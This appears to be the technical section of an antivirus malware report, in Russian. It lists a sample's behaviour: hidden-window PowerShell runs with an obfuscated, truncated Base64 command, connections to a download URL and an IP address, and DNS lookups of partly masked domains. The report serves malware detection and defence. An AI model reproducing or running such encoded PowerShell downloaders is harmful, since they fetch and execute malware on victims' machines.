Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAEUAVAAtAHYAQQByAGkAQQBCAGwAZQAgACgAIgAyADYAIgArACIAOABKAHUAIgArACIANAAiACkAIAAgACgAIAAgAFsAdABZAFAAZQBdACgAJwBTAHkAJwArACcAcwBUACcAKwAnAGUAJwArACcATQAnACsAJwAuAEkATw...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3852
- 'gu##any.net':80
- http://gu##any.net/zefiro/K/
- '35.##0.72.216':443
- DNS ASK gu##any.net
- DNS ASK ya###pin.net
- DNS ASK aa####ravels.com
- DNS ASK tc###xpo.com
- DNS ASK ea###acks.com
- DNS ASK co##she.com
- DNS ASK go####iceshoes.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAEUAVAAtAHYAQQByAGkAQQBCAGwAZQAgACgAIgAyADYAIgArACIAOABKAHUAIgArACIANAAiACkAIAAgACgAIAAgAFsAdABZAFAAZQBdACgAJwBTAHkAJwArACcAcwBUACcAKwAnAGUAJwArACcATQAnACsAJwAuAEkATw... (со скрытым окном)